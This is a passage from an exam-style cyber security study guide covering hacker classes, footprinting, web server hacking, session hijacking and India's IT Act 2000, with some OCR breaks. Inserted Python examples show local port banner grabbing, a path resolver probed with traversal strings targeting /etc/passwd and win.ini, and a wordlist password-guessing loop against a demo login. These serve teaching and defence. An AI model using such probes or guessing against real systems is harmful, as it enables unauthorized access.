Now the crackers are reforming by turning their hacking knowledge into 
legitimate use. They are forming enterprises to work with cyber security 
companies and sometimes law enforcement agencies to find and patch potential 
security breaches before their former counterparts can take advantage of them. 


(ii) Hacktivists — The conscious hackers with a cause are hacktivists. 
They originated from phreakers. Hacktivists carry out their activism in an 
electronic form in hope of highlighting what they consider noble causes such as 
institutional unethical or criminal actions and political and other causes. Hacktivists 
use several approaches to get the message across, like in the real world. These approaches 
may be automated e-mail bombs, web defacing, virtual sit-ins etc. 
(iii) Cyberterrorists — Cyberterrorists can be divided into two 
categories based on their motives. 

(a) Terrorists — The terrorists who are cyberterrorists have many 
motives, ranging from political, economic, religious, etc. Most often 
the techniques of their terror are through intimidation, coercion, or actual 
destruction of the target. 

(b) Information Warfare Planners — Attacking a target by 
disrupting the target's essential services by electronically controlling and 
manipulating information across computer networks or destroying the 
information infrastructure to threaten the war planners. 


Q.32. What are the different classes of hackers ? Discuss them in brief.
(R.G.P.V., Dec. 2010, June 2011)
Or
Write short note on classes of hacker. (R.G.P.V., Dec. 2013)
Or
Discuss the classes of hackers. (R.G.P.V., Dec. 2016)

Ans. There are many ways to classify those who break into computer 
systems, depending on which source you are reading. However, most lists of 
the types of hackers include the following — 


(i) Black Hat Hackers — Black hats are the bad guys — the malicious 
hackers or crackers who use their skills for illegal or malicious purposes. 
Black hat hackers are motivated by greed or desire to cause harm. They target 
specific systems, write their own tools, and generally attempt to get in and out 
of a target system without being detected. Because they are very knowledgeable
and their activities are often undetectable, black hat hackers are among the most
dangerous.

(ii) White Hat Hackers — This group considers itself to be the good 
guys. Although white hat hackers may crack a system, they do not do it for 
personal gain. When they find a vulnerability in a network, they report it to the 
network owner, hardware vendor or software vendor, whichever is appropriate. 
They do not release information about the system vulnerability to the public
until the vendor has had a chance to develop and release a fix for the problem.
White hat hackers might also be hired by an organization to test a network's
defenses.

White hat hackers are very knowledgeable about programming and about
existing vulnerabilities that have been found and fixed. They
typically write their own cracking tools.


(iii) Grey Hat Hackers — Grey hats are hackers who may work
offensively or defensively, depending on the situation. This is the dividing line between
hacker and cracker. Both are powerful forces on the Internet, and both will
remain permanently. And some individuals qualify for both categories.
The existence of such individuals further clouds the division between these
two groups of people.
(iv) Suicide Hackers — Hackers in this category perform their
activities with little regard for the law or staying undetected. They seek to
accomplish their goals at all costs and do not worry if they are caught. Their
goals could include political, terrorist or other aims.


Q.33. Write short note on footprinting. (R.G.P.V., Dec. 2012)

Ans. Footprinting is the first and most convenient way that hackers use
to gather information about computer systems and the companies they belong
to. The purpose of footprinting is to learn as much as you can about a system,
its remote access capabilities, its ports and services, and the aspects of its
security.

In order to perform a successful hack on a System, it is best to know as 
much as you can, if not everything, about that System. While there is nary a 
company in the world that is not aware of hackers, most companies are now 
hiring hackers to protect their systems. And since footprinting can be used to 
attack a system, it can also be used to protect it. If you can find anything out 
about a system, the company that owns that system, with the right personnel, 
can find out anything they want about you. 


Footprinting is necessary for one basic reason — it gives you a picture of 
what the hacker sees. And if you know what the hacker sees, you know what 
potentia] Security exposures you have in your environment. And when you 
know what exposures you have, you know how to prevent exploitation. 


Hackers are very good at one thing — getting inside your head, and you do
not even know it. They are systematic and methodical in gathering all pieces
of information related to the technologies used in your environment. Without a
sound methodology for performing this type of reconnaissance yourself, you
are likely to miss key pieces of information related to a specific technology or
organization — but trust me, the hacker won't.

Be forewarned, however, footprinting is often the most arduous task of
trying to determine the security posture of an entity; and it tends to be the
most boring for freshly minted security professionals eager to cut their teeth
on some test hacking. However, footprinting is one of the most important
steps and it must be performed accurately and in a controlled fashion.
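As an added example (not from the original text and not from any particular scanner), the kind of probe that footprinting of "ports and services" consists of: connect to each port, record whether it is open, and read the first bytes the service volunteers, its banner. The target is a constructed stand-in service on the loopback address so the code runs offline; the fingerprint table and the function names are assumptions for illustration. Probing systems you do not own or have written authorisation to test is exactly the unauthorised access the rest of this unit describes.

```python
import socket
import threading


def start_fake_service(banner: bytes) -> socket.socket:
    """Constructed stand-in for a real listening daemon (a fixture for this
    example only): answers every connection with the given banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0: the OS picks a free port
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:             # listening socket closed: stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv


def probe(host: str, port: int, timeout: float = 1.0) -> dict:
    """One footprinting probe: is the TCP port open, and what does the service
    say first? SSH, SMTP and FTP announce themselves before the client sends
    anything, which is what a banner grab relies on."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:                 # refused, unreachable or timed out
            return {"port": port, "state": "closed", "banner": None}
        try:
            data = s.recv(256)
        except socket.timeout:          # open but silent (HTTP waits for a request)
            data = b""
        banner = data.decode("ascii", errors="replace").strip() or None
        return {"port": port, "state": "open", "banner": banner}


def identify(banner):
    """Tiny fingerprint table (assumption for illustration): banner prefix -> service."""
    if not banner:
        return "unknown"
    if banner.startswith("SSH-"):       # "SSH-<protocol>-<software>"
        return "ssh " + banner.split("-", 2)[2]
    if banner.startswith("220 "):       # SMTP/FTP greeting
        return "smtp/ftp " + banner[4:]
    return "unknown"


def footprint(host: str, ports) -> list:
    """What the hacker, or the defender doing the same reconnaissance first,
    learns about the host's ports and services."""
    results = []
    for port in ports:
        entry = probe(host, port)
        entry["service"] = identify(entry["banner"])
        results.append(entry)
    return results


def demo() -> list:
    # Constructed banner; a real footprint records whatever the target sends.
    svc = start_fake_service(b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n")
    open_port = svc.getsockname()[1]
    tmp = socket.socket()               # grab and release a second free port,
    tmp.bind(("127.0.0.1", 0))          # so the scan also sees a closed one
    closed_port = tmp.getsockname()[1]
    tmp.close()
    try:
        return footprint("127.0.0.1", [open_port, closed_port])
    finally:
        svc.close()


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

The same probe run against a real host gives the defender the list the text calls "what the hacker sees"; anything in it that should not be reachable from outside is an exposure to close before someone else finds it.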


Q.34. Explain the extremists and insurgents groups.

Ans. Extremists have doubled their efforts to pursue their objectives
(which are not based on truth or fact) of creating violence and instability
across the world, together with terrorists. The year 2014 was the worst year in
recent years, because 93 countries experienced an attack and 22,700 people
were killed across the world. ISIS (Islamic State of Iraq and Syria) and Al Qaeda
were the main sources of the terror. Such global groups are more than just loose
associations of radicalised fighters; the threats will grow at a rapid pace because
in some regions terror organizations have sub-contracted their operations to
mercenaries, criminals and warlords. Hence the vulnerability would be created by
such networks, even where the terror organizations do not have their own footprint.

India is facing multiple threats from religious, secessionist and separatist
organizations. The threat is from Islamic extremist organizations/countries,
left wing extremists (LWE), secessionist organizations from the North East,
and now even from communal forces. The challenge before the government
is to protect the citizens of the country by preventing and denying recruitment
of the youth into terror/insurgent organizations, keeping terrorists out of the
society, denying their access to funds, weapons and safe havens, stripping the
terrorists from their roots and preventing networking between insurgents
and various terror organizations.

In cyber terminology the insurgency is defined as "An organized movement
aimed at the disruption of cyber systems through subversion and armed
cyber conflict".

There may be different goals of cyber insurgency but the following
conditions are necessary —

(i) A common entity or authority against whom the actions are directed
is a must.

(ii) The tools of cyber insurrection and the systems to launch attacks
against the entities are needed.

(iii) Cyber forces may be used by the cyber insurgents against their
targets.

Cyber security professionals learn from the records of irregular or
low intensity warfare to better understand how to fight against this threat.
This shows how we can modernize our strategies of cyber security.

The Internet has become a tool for radicalisation, recruitment,
communication and training for terrorists and extremists. As a medium, the
decentralised nature of the Internet has made it difficult for governments all
over the world to respond to threats emerging from it.

The terrorist groups are using social media as a way to incite violence. It is
used for operations, ideation, indoctrination and recruitment. It targets people
to inspire them to take action individually, making it hard for states to identify
and track them.


Q.35. What do you mean by hacking of web servers ?

Ans. The term web server has two meanings, since it is related to both
hardware and software, so there are two kinds of web servers. In the hardware
context, a web server is a computer that serves web pages and documents using
HTTP over the world wide web. Such a computer on the Internet containing a
website must have a web server program. A web server program is used to
provide various types of services, such as sending and receiving e-mails,
downloading requests for a file and even more. Hence there are great chances
of web server hacking. Web server hacking is an attack that completely relies
on HTTP traffic to attack a server and for defacement of websites. The
methods to hack web servers are —

(i) Types of web server vulnerabilities
(ii) Web server defacement
(iii) IIS exploits
(iv) Web server protection checklist.

The methods given above can be used to hack a web server as follows —

(i) Types of Web Server Vulnerabilities — A web server can be hacked
by finding vulnerabilities in it. A few common vulnerabilities are discussed
below —

(a) Misconfiguration — Generally Microsoft's IIS acts as a
web server using the default website. Users of the default website can
access all the files in the default website folder, and similarly have full
control permissions on those files. Consequently, the default website is
open to attack.

(b) Bugs — These include operating system bugs, application
bugs, or flaws in the programming code.

(c) Default Installation — The default settings of the web server
software or operating system must not be left as they are; they should be
hardened and updated on a regular basis.


(ii) Web Server Defacement — A web server defacement or a website
defacement means that a hacker attacks a website and changes the visual
appearance of the website. Mainly a web server listens on TCP port 80 (HTTP) and
TCP port 443 (HTTPS). Therefore these ports need to be open for passing traffic
between the web server and the client.


(iii) IIS Exploits — Windows IIS is one of the popular web server
products. Therefore, web servers that run IIS have a higher probability of being
attacked.

(a) Root Directory — The root directory stores the home page of a
website (the index or default documents) for the web server. A root directory
includes subdirectories. Sub-directories store other types of files, such as
scripting files, images etc.

(b) Source Disclosure — This type of attack accesses the source
code of the application running on a web server, and with the help of this source
code a hacker identifies the history of the application, such as application
type, programming language, and much more information.

(c) Buffer Overflow — In this attack a larger amount of data is sent
to the web server than the buffer set aside to receive it can hold. The web
server is unable to handle the data, and the excess overwrites adjacent memory.
So a buffer overflow takes place.


(iv) Web Server Protection Checklist — When we need to protect
our web server, we can use a web server protection checklist. This checklist
contains the parameters that hackers use to attack a web server, so that each
of them can be checked and hardened.
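As an added example (not from the original text, and not IIS or any other product's code), the misconfiguration and source-disclosure points above in code: the way a static-file handler maps a requested URL onto the document root decides whether "../" walks out of the root and whether application source and configuration files under it get served. A naive resolver is shown beside a hardened one. The document root, the blocked-extension list, the function names and the probe requests are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/site"                      # assumed document root
DEFAULT_DOCUMENT = "index.html"                # home page served for "/"
# Application source or configuration: never serve these even when they sit
# under the document root (assumed list for illustration).
SOURCE_EXTENSIONS = {".py", ".php", ".asp", ".aspx", ".config", ".inc", ".bak", ".old"}


def resolve_vulnerable(url_path: str) -> str:
    """Naive mapping: trusts the request, so '../' leaves the document root
    and any readable file on the server, source included, can be fetched."""
    return DOCROOT + "/" + url_path.lstrip("/")


def resolve_hardened(url_path: str):
    """Returns the filesystem path to serve, or None to refuse the request.
    Refuses traversal, hidden files, source/config files and encoding tricks."""
    path = url_path.split("?", 1)[0]           # the query string is not part of the path
    decoded = unquote(path)                    # decode percent-encoding exactly once
    if "\x00" in decoded or "%" in decoded:    # NUL truncation or double encoding
        return None
    # IIS treats '\' as a separator too; normalise before inspecting segments.
    segments = [s for s in decoded.replace("\\", "/").split("/") if s and s != "."]
    if ".." in segments:                       # traversal attempt: refuse, do not "fix"
        return None
    if any(s.startswith(".") for s in segments):   # /.git/config, .htpasswd, ...
        return None
    if not segments:
        segments = [DEFAULT_DOCUMENT]
    if posixpath.splitext(segments[-1])[1].lower() in SOURCE_EXTENSIONS:
        return None                            # would be source disclosure
    full = posixpath.join(DOCROOT, *segments)
    # Defence in depth: the result must still lie inside the document root.
    if not posixpath.normpath(full).startswith(DOCROOT + "/"):
        return None
    return full


# Constructed requests, as a visitor and an attacker might send them.
PROBES = [
    "/index.html",
    "/images/logo.png?v=2",
    "/../../etc/passwd",
    "/%2e%2e/%2e%2e/windows/win.ini",
    "/%252e%252e/secret",
    "/app/config.py",
    "/.git/config",
    "/",
]


def compare() -> dict:
    """Side by side: what each resolver would serve for every probe."""
    return {p: (resolve_vulnerable(p), resolve_hardened(p)) for p in PROBES}


if __name__ == "__main__":
    for request, (naive, hardened) in compare().items():
        print(f"{request:36} naive={naive}  hardened={hardened}")
```

Two design points: a traversal attempt is refused rather than silently normalised, so the request can be logged as hostile, and the extension check happens on the decoded, normalised last segment, so `config%2epy` and `config.py` are treated alike.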


Q.36. What do you mean by session hijacking ? (R.G.P.V., Nov. 2019)

Ans. Session layer protocols maintain state through a session identifier,
and the identifiers are usually valid for an extended period. If the session
identifier is not protected, for example sent in the clear, then an attacker may
acquire the session identifier and hijack the session. This is a common style of
network attack, and is referred to as session hijacking.

Web cookies readily lend themselves to session hijacking. Many
computer viruses, like Sasser and Berbew, harvest Web cookies from
infected hosts. These cookies store active session information, allowing
an attacker to effectively hijack a session. For example, some variants of
Agobot looked for Web cookies associated with Bank of America and
sent them to a remote system managed by the attacker. Using the stolen
cookie, the attacker could access the Bank of America account without
needing login credentials.


To mitigate attacks from stolen sessions, cookies should be disabled or
removed when the browser closes. Cookies may be cryptographically linked
to a specific network address. Since network addresses are difficult to forge
outside the local network, hijacking becomes much more difficult.

Web servers can also create Web cookies with specific lifetimes; after
the lifetime passes, the cookie is no longer valid. These servers can protect their
customers by assigning cookies with short lifetimes. Unless the cookie is
used immediately, the expired session has little value to an attacker.

Kerberos uses many of these mitigation steps. Each ticket has a limited
duration; before the ticket expires, the client "renews" the ticket by requesting
a new one. Tickets are associated with client-specific information (client
address, session key, etc.) and are cryptographically protected. Unless the
attacker can get past the encryption and impersonate the client, the limited
duration restricts the window of opportunity for hijacking.


Q.37. How does session hijacking work ?

Ans. Since HTTP communication uses many TCP connections, the web
server needs a method to recognize every user's connections. The most useful
method depends on a token that the server sends to the client browser after a
successful authentication. This token is composed of a string of variable width,
and it could be used in different ways, like in the URL, in the header of the
HTTP request as a cookie, in other parts of the header of the HTTP request, or in
the body of the HTTP request. The attack compromises the session token by
stealing or predicting a valid session token to gain unauthorized access to the
web server. The compromise of a session token can occur in different
ways, two of which are as follows —

(i) Session Sniffing — The session token is a string which is
the session id of a valid session. The attacker first tries to find this session id.
The attacker uses a sniffer to capture the session id from the network traffic. Once
the session id is captured, the attacker uses it to gain unauthorized access to the web server.

(ii) The Cross-site Script Attack — Getting the session id
by running a malicious code or script on the client side is the
cross-site script attack. In this attack, the malicious scripts, also known as
malicious payloads, are injected into a legitimate website or web application
by the attacker. In this attack the victim is not targeted directly by the attacker;
rather the attacker exploits a vulnerability in a website that the victim would
visit, and uses the website to deliver the malicious script to the victim's browser.


Q.38. How can we prevent session hijacking ?

Ans. As we know, the session id is stolen by installing malicious
code on the website the client uses, and then the cookies are stolen. The best approach
to prevent session hijacking is that the protection should be enabled from the
client side. Taking preventive measures on the client side for session hijacking
is highly recommended. The users should have efficient antivirus and anti-malware
software and should keep the software up-to-date.

There is also a technique that uses engines which fingerprint all requests of a
session. Besides tracking the IP address and SSL session id, the engines also
track the HTTP headers. Each change in the headers adds penalty points to the
session, and the session gets terminated as soon as the points exceed a certain
limit. This limit can be configured. This is effective because when hijacking
occurs, the attacker's requests will have a different HTTP header order.

These are the recommended preventive measures to be taken from both
the client and server sides, in order to prevent the session hijacking attack.

UNIT - III

CYBERCRIME AND CRIMINAL JUSTICE — CONCEPT OF
CYBERCRIME AND THE IT ACT 2000, HACKING, TEENAGE
WEB VANDALS, CYBER FRAUD AND CHEATING,
DEFAMATION, HARASSMENT AND E-MAIL ABUSE


Q.1. Define the concept of cybercrime and the Indian IT Act 2000.

Ans. Following the United Nations General Assembly Resolution A/RES/51/
162, the IT Act 2000 was enacted by adopting the Model Law on Electronic Commerce
adopted by the United Nations Commission on International Trade Law (UNCITRAL).

The term cybercrime is not defined in the Indian IT Act 2000. Generally
there are two definitions of cybercrime. The first definition says that
"cybercrime contains only those crimes which are included in the IT Act 2000".
This definition is limited to tampering with computer source code, hacking
and cyber pornography. Other cyber related crimes such as cyberdefamation,
e-mail spoofing, cyberfraud etc. would not be treated as cybercrime.

The second definition can be given as — "A crime which is committed or
omitted, with the help of or through or connected with the Internet, and prohibited
by law, and for which punishment by penalties or imprisonment is provided,
will be called cybercrime".

This definition also does not cover all the crimes under the Indian IT Act
2000. For example — if a person threatens another on the Internet and the latter
commits suicide, then that person will be charged with the offence of criminal
intimidation under section 506 of IPC, 1860. He will not be charged under the
Indian IT Act 2000. So there are a few cybercrimes which are included in the IT
Act 2000, and there are many other crimes in cyberspace which are covered
in the IPC 1860.

The Indian IT Act was enacted in 2000. The purpose of the Indian IT Act
2000 was also to make changes in the Indian Penal Code (IPC), the Indian Evidence
Act 1872, the Banker's Books Evidence Act 1891 and the Reserve Bank of India
Act 1934. Section 58B about penalties was included in the Reserve Bank
of India Act. Some important changes were introduced in the IT Act 2000 to
accommodate the current cybercrime scenario.


Q.2. What is IT Act 2000 ? Write the salient features of IT Act 2000.
(R.G.P.V., 2014)

Ans. IT Act 2000 — Refer to Q.1.

Features of IT Act 2000 — The features of the Indian IT Act 2000 are as follows —

(i) An e-mail was not accepted under the prevailing statutes of India
as a legal form of communication or as evidence in a court of law. The
IT Act 2000 changed this scenario by giving legal recognition to the electronic form.

(ii) The ITA 2000 has provided the legal infrastructure for companies in the
corporate sector to carry out e-commerce transactions.

(iii) The concept of digital signature is provided for corporates to
carry out their transactions online. Digital signatures are legally valid and
sanctioned under the ITA 2000.

(iv) Now the companies store their information on their
computer systems, apart from maintaining a backup. Under the ITA 2000 it became
possible for a corporate to have a statutory remedy if anyone breaks into its computer
systems and causes damage or copies data. The remedy
provided by the ITA 2000 is in the form of monetary damages by way of
compensation, up to ₹ 10,000,000 (one crore).

(v) Various cybercrimes were defined in the ITA 2000. Before the
cyberlaw came into effect, the corporates were helpless as there was no
legal redress for such issues.
Q.3. What are the limitations of IT Act 2000 ?

Ans. The limitations of the IT Act 2000 are as follows —

(i) The issues related to domain names are not included in the ITA 2000.
E-commerce is based on the system of domains, yet domain names have not
been defined in the IT Act 2000. The rights and liabilities of domain name
holders are not included in the law.

(ii) The issues concerning the prot
ection of Intellectual Property
Rights (IPR) in the context of the online environment are not dealt with in the ITA
2000. The issues related to online copyrights, trademarks and patents etc. are
not covered in this law.

(iii) There are many new forms and manifestations of cybercrimes emerging
even as the cyberlaws are being developed. The offences defined in the ITA
2000 are by no means exhaustive. It does not cover various types of cybercrimes
such as Internet time theft, cyberdefamation, cyberfraud, cyberharassment,
misuse of credit cards, cyberstalking etc.

(iv) The ITA 2000 has not tackled vital issues pertaining to
e-commerce like privacy and content regulation, to name a few.

(v) The applicability of the IT Act to negotiable instruments is avoided.
The Act is not explicit about the regulation of electronic payments. The
Act stays silent over the regulation of electronic payment gateways and
excludes negotiable instruments from its applicability.
This may have a major effect on the growth of e-commerce.

(vi) The antitrust issues are not included in the IT Act.

(vii) The IT Act 2000 does not lay down parameters for its
implementation, and this is the most serious concern related to the Indian
cyberlaws. Also, when Internet penetration in India is extremely low and
government and police officials are not very computer savvy, the new Indian
cyberlaw raises more questions than it answers.

(viii) There may be a conflict of jurisdiction under the IT Act 2000.
Q.4. What is the need of cyberlaw in India ?

Ans. Cyberlaw is a framework that is created to give legal recognition to all risks
arising out of the usage of computers, computer systems, or computer networks.
Many aspects such as data protection and privacy, freedom of
expression and crimes committed using computers come under the cyberlaw.
The first cyberlaw passed by the Indian Parliament was the IT Act 2000, of which
the aim was to provide the legal infrastructure for e-commerce in India. The ITA
2000 was approved by the President of India and now it has become the law of
the land in India. To regulate Internet-based and computer-related transactions in
India, the Government of India felt the need to pass a relevant cyberlaw. It was
mentioned that the ITA 2000 was an Act to provide legal recognition for
transactions carried out by means of electronic data interchange and other
means of electronic communication, referred to as e-commerce, when it was
introduced.

The reasons to pass the IT Act 2000 in India are as follows —

(i) Although all possible situations and cases that have occurred or
might take place in future are covered in a very well-defined legal system in
India, when it comes to the newly developed Internet technology the country lacks
in many aspects. Because of the increasing use of the Internet it was necessary to
fill this gap with suitable law.

(ii) Since the Internet is the most dominating medium for carrying out business
today, there was a need to give some legal recognition to the Internet.

(iii) A new concept called cyberterrorism came into effect with
the growth of the Internet. Cyberterrorism includes the use of disruptive
activities with the intention to further social, ideological, religious etc.
objectives in the world of cyberspace. It was about committing similar offences,
but in an innovative way.

Considering all these factors, the Information Technology Bill was passed
on 17 May 2000 by the Indian Parliament. It was called the IT Act 2000.


Q.5. Why do we need cyber security ? Explain.

Ans. Cyber security is the protection of Internet-connected systems, including
hardware, software and data, from cyber attacks. In a computing context,
security comprises both cyber security and physical security; both are used by
enterprises to protect against unauthorized access to data centres and other
computerized systems. Information security, which is designed to maintain the
confidentiality, integrity and availability of data, is a subset of cyber
security.

The range of operations of cyber security involves protecting information
and systems from major cyber threats. These threats take many forms. As a
result, keeping pace with cyber security strategy and operations can be a
challenge, particularly in government and enterprise networks where, in their
most innovative form, cyber threats often take aim at secret, political and
military assets of a nation, or its people. Some of the common threats are as
follows —

Cyber Terrorism — It is the innovative use of information technology by
terrorist groups to further their political agenda. It takes the form of attacks on
networks, computer systems and telecommunication infrastructures.

Cyber Warfare — It involves nation-states using information technology
to penetrate another nation's networks to cause damage. In the
U.S. and many other nations, cyber warfare has been
acknowledged as the fifth domain of warfare. Cyber warfare attacks are
primarily executed by hackers who are well-trained in exploiting the details
of computer networks, and who operate under the auspices and support of
nation-states. Rather than shutting down a target's key networks, a cyber-warfare attack
may intrude into networks to compromise valuable data,
degrade communications, impair such infrastructural services as transportation
and medical services, or interrupt commerce.

Cyber Espionage — It is the practice of using information technology to
obtain secret information without permission from its owners or holders. It is
most often used to gain strategic, economic or military advantage, and is
conducted using cracking techniques and malware.
Q.6. Write short note on hacking. (R.G.P.V., June 2012, Dec. 2015)

Ans. The term hacking used to mean expert writing and modification of
computer programs. Hackers were considered people who were highly
knowledgeable about computing. They were considered computer experts who
were capable of doing all the wonders through programming. Today,
the term refers to a process of gaining unauthorized access into a
computer for a variety of purposes, including stealing and altering data, and
political demonstrations. For some time now, hacking as a political
tool has been used during international crises. During such a
period, hacking is used to express sentiments over the crisis.

Q.7. Write short note on hacking tools. (R.G.P.V., Dec. 2003, 2011)

Ans. Attackers use several tools to gain access to secure systems. Some
of those tools are —

(i) Password Guessing — Because access to most programs depends
on the password authentication protocol (PAP), the would-be attacker attempts
to guess both user name and password. The user name is usually simple because it
often is also used as an e-mail ID. The determination of the password is a
calculated guess. Fig. 3.1 shows the PAP process.

Fig. 3.1 Password Authentication Protocol (exchange between client and
server: Request for User ID, User ID, Request for Password, Password, then
Log-in Based on User Database Check)

Therefore passwords must be designed and controlled to make their
guessing a very complex proposition.

(ii) External Programs — Several remote programs are used to
attempt to capture and control the operation of a computer and to access, read,
manipulate, or delete data. Table 3.1 lists a few examples with a definition of
their legitimate purpose.
lin. di 
Table 3.1 External Programs

Program | Legitimate purpose
Virtual terminal program | A virtual terminal program that permits a remote device to attach itself to a local computer in the form of a terminal; it is used by systems people to update and manipulate files.
Network management software | Tools designed to access remote system resources for management purposes.
Port mappers | Used by administrators to determine the users and processes operating certain shared system services.
Database replication services | Software tools used to transfer record updates to server databases.

(iii) Malicious Programs — Fig. 3.2 shows an overall taxonomy of
software threats, or malicious programs. These threats can be divided into two
categories — those that need a host program, and those that are independent.
The former are essentially fragments of programs that cannot exist
independently of some actual application program, utility, or system program.
The latter are self-contained programs that can be scheduled and run by the
operating system.

Fig. 3.2 Taxonomy of Malicious Programs (tree rooted at "Malicious
Programs", split into threats that need a host program and independent threats;
the branches visible include Trap Doors, and the self-replicating types are
marked "Replicate")
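As an added example (not from the original text or any product), the PAP exchange of Fig. 3.1 seen from the server side, together with what "designed and controlled" passwords mean in practice: the user database stores salted PBKDF2 hashes rather than passwords, and the server counts failures and locks the account so that a calculated online guess stops paying off. The attacker's side walks a small wordlist against the login, the calculated guess the text describes. The user names, passwords, wordlist, failure limit and function names are constructed assumptions for illustration; the PBKDF2 iteration count is kept low so the example runs quickly.

```python
import hashlib
import hmac
import os
from typing import Optional

MAX_FAILURES = 5          # failures allowed before the account locks (assumption)
LOCKOUT_SECONDS = 900     # how long the lock lasts (assumption)
PBKDF2_ROUNDS = 20_000    # kept low for the example; production uses far more


def hash_password(password: str, salt: Optional[bytes] = None):
    """Salted PBKDF2-HMAC-SHA256: the database never stores the password itself."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class PapServer:
    """Server side of PAP (Fig. 3.1): the client sends user ID and password in
    the clear and the server checks them against the user database. Failure
    counting and lockout are added here because PAP itself has neither."""

    def __init__(self, users: dict, max_failures: int = MAX_FAILURES):
        self.db = {name: hash_password(pw) for name, pw in users.items()}
        self.max_failures = max_failures
        self.failures = {}        # user -> consecutive failed attempts
        self.locked_until = {}    # user -> time the lock expires

    def login(self, user: str, password: str, now: float) -> str:
        """Returns 'ok', 'fail' or 'locked'."""
        if self.locked_until.get(user, 0.0) > now:
            return "locked"
        record = self.db.get(user)
        if record is not None:
            salt, stored = record
            _, candidate = hash_password(password, salt)
            if hmac.compare_digest(candidate, stored):   # constant-time compare
                self.failures[user] = 0
                return "ok"
        # Unknown users are counted too, so the response does not reveal which
        # user names exist (the "guess the user name" step in the text).
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.max_failures:
            self.locked_until[user] = now + LOCKOUT_SECONDS
            self.failures[user] = 0
        return "fail"


def guess_online(server: PapServer, user: str, wordlist, now: float):
    """Attacker's calculated guess: try each word against the live login.
    Returns (password or None, number of attempts made)."""
    for attempt, word in enumerate(wordlist, start=1):
        result = server.login(user, word, now)
        if result == "ok":
            return word, attempt
        if result == "locked":
            return None, attempt
    return None, len(wordlist)


# Constructed user database and wordlist for the demonstration.
USERS = {"alice": "Winter2024!", "bob": "k7#Vq9!zLp2&wXr"}
WORDLIST = ["123456", "password", "qwerty", "letmein", "welcome1",
            "Winter2024!", "dragon", "monkey"]


def demo() -> dict:
    t0 = 1_700_000_000.0
    lenient = PapServer(USERS, max_failures=10**9)  # no lockout: guessing succeeds
    strict = PapServer(USERS)                        # lockout after MAX_FAILURES
    return {
        "no_lockout": guess_online(lenient, "alice", WORDLIST, t0),
        "with_lockout": guess_online(strict, "alice", WORDLIST, t0),
        "strong_password": guess_online(lenient, "bob", WORDLIST, t0),
        "owner_during_lock": strict.login("alice", "Winter2024!", t0 + 60),
        "owner_after_lock": strict.login("alice", "Winter2024!", t0 + LOCKOUT_SECONDS + 1),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The lockout cuts both ways: the legitimate owner is also refused while the lock lasts, so an attacker who only wants to deny service can trigger it deliberately, which is why production systems usually combine a per-account counter with per-source rate limiting instead of relying on lockout alone. The hashing also matters for the offline case PAP makes possible: a password captured from the cleartext exchange is lost regardless, but a stolen database of PBKDF2 hashes still costs the attacker one full hash computation per guess.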


Q.8. What do you mean by the term Teenage Web Vandals ?

Ans. Security experts also call the teenage web vandals Packet
Monkeys, Script Kiddies and Ankle-Biters. These are the teenage gangs who
love to play real games in the virtual world. Various opportunities, which were
unimaginable before, were thrown up in the 1990s by the Internet and information
technology.

Some examples of billionaires and super achievers are Sabeer Bhatia
(founder of Hotmail), Jerry Yang (founder of Yahoo), Marc Andreessen (founder
of Netscape) etc., who became billionaires below the age of 35 years. But now,
to become a billionaire and famous, nobody has to wait till 35 years, because of
the attraction of IT. But this attraction is also giving birth to teenage
cyber criminals.

Either web pages are defaced or remarks are tagged on websites by most
teenage web vandals. Now cybercrime has become fashionable
and a favourite of netizens in India.

Even if the web defacement and tagging of websites are harmless or
minor, a fear is created in the Internet community; this fear has
raised the cost of security, and there are many doubts about the future of e-commerce.

The motivating factors and causes of teenage web vandals are as follows —

(i) They want to be famous and get publicity all over the world using
the Internet.

(ii) Excitement of achievement and greatness by doing something
different.

(iii) There is no fear of the law and its enforcement, due to the anonymity
provided by the Internet.

(iv) They do not know the bad effects of the act of defacing or hacking.
They think that no loss is caused by their acts.

(v) By doing this, they are claiming that they have a good knowledge
of computer programming and the Internet.

(vi) Their knowledge of the Internet and computer programming is not
directed in the right direction.

(vii) The resources needed to commit hacking and defacement of websites
are cheap and easily available.


Q.9. Discuss the term cyber fraud and cheating.

Ans. The frauds which are committed on the Internet are known as cyber
fraud. About one-third of all cybercrimes consist of cyber frauds. Cyber
frauds are increasing day by day. Cyber frauds are increasing with the growth
of e-commerce because that is where their profitability lies.
Victims of cyber fraud do not disclose the case because of fear of loss of
public trust, image, business etc. Some cases of cyber fraud and cheating
include misuse of credit cards by hacking the password, bogus investments,
illegal transfer of funds etc.

The term is not included in the IT Act 2000, so we have to follow
other laws such as the Indian Penal Code 1860, the Indian Contract Act 1872 etc. The
acts given below amount to fraud.

(i) A suggestion which is not true.
(ii) A promise made without any intention of fulfilling it.
(iii) Acts or omissions which the law declares to be fraudulent.

In the law of contract this definition of fraud is applied to contractual or
civil relations between parties and has no applicability to criminal law. So
for the purpose of criminal law, the term cyber fraud would be inappropriate,
and instead the term cyber cheating would be more
appropriate in India. The term cyber fraud in India can be used only in civil
law and the law of contract, for claiming damages and compensation.

For the acts of cyber cheating not only the punishment under the criminal
law but also the compensation for damages under civil laws are included.
There is no definition or offence of fraud in the Indian Penal Code (IPC), even
though many other provisions which contain the ingredient of fraudulent action
are there.

The ingredients of cheating are as follows —

(i) A person makes a false representation which he/she
knows to be false.

(ii) Deceiving a person by making a false representation to him/her,
with a dishonest intention.

(iii) The deceived person is induced to deliver any property or to do
or omit to do something.

The punishment for cheating a person/firm is imprisonment which may
be extended to one year, or fine, or both.


Q.10. Describe various offences of fraud and cheating in the Indian Penal Code which are similar to cyberfraud. 

